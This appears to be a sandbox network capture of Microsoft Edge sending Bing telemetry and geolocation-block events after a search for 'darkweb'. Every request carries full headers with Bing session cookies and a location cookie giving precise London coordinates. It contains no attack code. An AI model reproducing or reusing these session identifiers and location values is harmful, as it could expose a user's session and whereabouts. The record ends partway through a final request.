https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e698
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e6ee
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306943.7f1f2e7
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

expires: Sat, 30 Nov 2024 02:29:54 GMT
last-modified: Tue, 24 Sep 2024 06:11:01 GMT
etag: 0x8DCDC5FAA0C3E31
cache-control: public, no-transform, max-age=369661
content-length: 644
content-type: image/gif
content-md5: HGU2zuFG7AoIwp9z9fxz2A==
x-ms-request-id: 2ff3b732-601e-004e-3620-152f75000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a7361602.1729689441.eeaf154
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Wed, 04 Dec 2024 10:09:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306944.7f1f539
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932139%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932139%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306944.7f1f524
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306932165%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22878.999999986263%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221791.9999999867287%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932244%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306932165%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22878.999999986263%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221791.9999999867287%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932244%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D 